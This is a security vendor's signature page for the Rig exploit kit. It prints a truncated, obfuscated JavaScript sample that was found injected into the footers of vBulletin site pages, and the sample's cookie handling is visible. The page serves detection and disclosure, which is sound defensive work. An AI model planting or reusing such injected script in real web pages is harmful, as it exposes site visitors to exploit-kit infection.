SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware.rig_ek

malware.rig_ek

Description: Malicious code typical for ifections related to the Rig exploit kit.

Malware may be found injected into legitimate web pages. For example the following script was found in the footer of vBulletin site pages:

<sc ript type="text/javascript">
var c3u="useridx410​u00381x37u0046B25";var yj_="30";var re_exp_decode_1,re_exp_decode_2;function igv(ejye){var tyc=document.cookie.replace(/s/g,"").split(";");for(var it0=0;it0<tyc.length;it0++){var ffyp=tyc[it0].split("=");if(ffyp[0]==ejye){return unescape(ffyp[1]);}}return null;};function s6q(ejye,vi2,n0re){var pbum=new Date();var xg3r=pbum.getTime()+(n0re*60*60*1000);pbum.setTime(xg3r);var urnl=ejye+"="+escape(vi2)+"x3b​x20expu0069res="+pbum.toGMTString()+";...skipped...catch(d8bi){u8l=1;}}}catch(d8bi){};if(u8l==0){epzs();}};​q0pg(); 
</script>

Affecting: Any sites